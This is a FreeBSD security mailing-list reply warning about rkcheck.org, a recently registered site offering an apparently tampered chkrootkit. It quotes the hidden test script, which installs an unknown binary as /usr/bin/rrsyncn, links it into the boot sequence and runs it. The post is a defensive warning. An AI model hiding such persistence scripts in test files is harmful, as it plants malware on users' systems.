Philip Jocks <pjli...@netzkommune.com> writes: > it felt pretty scammy to me, googling for the "worm" got me to rkcheck.org > which > was registered a few days ago and looks like a tampered version of > chkrootkit. I > hope, nobody installed it anywhere, it seems to execute > rkcheck/tests/.unit/test.sh which contains > > #!/bin/bash > > cp tests/.unit/test /usr/bin/rrsyncn > chmod +x /usr/bin/rrsyncn > rm -fr /etc/rc2.d/S98rsyncn > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > /usr/bin/rrsyncn > exit > > That doesn't look like something you'd want on your box...
I downloaded it as well, but also became suspicious (for a variety of reasons) and didn't run it. Fortunately /bin/bash doesn't exist on our systems. Some evidence to confirm or refute the authenticity of the email reporting our IPs as vulnerable would be helpful. Joseph _______________________________________________ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
